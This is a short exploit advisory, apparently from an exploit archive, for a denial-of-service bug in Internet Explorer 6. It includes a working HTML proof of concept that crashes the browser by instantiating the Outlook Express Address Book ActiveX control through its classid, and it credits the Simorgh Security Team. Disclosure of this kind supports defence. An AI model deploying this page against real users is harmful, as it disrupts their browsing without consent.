IE 6 / MS Office Outlook Express Address Book Activex DoS Affected Software : MS Internet Explorer 6.x Overview: ----------------- when a browser use MS outlook Express Address book ActiveX , crash the browser immediately. An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer version 6(.x) . PoC (HTML) ------------------ <!-- [~] Microsoft Office Outlook Express Address Book DoS [~] Tested on windows XP sp2 , IE 6 [~] Simorgh Security Team / www.simorgh-ev.org [!] Hessam-x / www.Hessamx.net --> <HTML> <object classid='clsid:233A9694-667E-11d1-9DFB-006097D50408' id='outlook' /></object> <center> Microsoft Office Outlook Express Address Book DoS</center> <center>Hessamx</center> </HTML> Credit ------------------ Discovered By Hessam Salehi (Hessamx) Simorgh Security Team / www.simorgh-ev.org
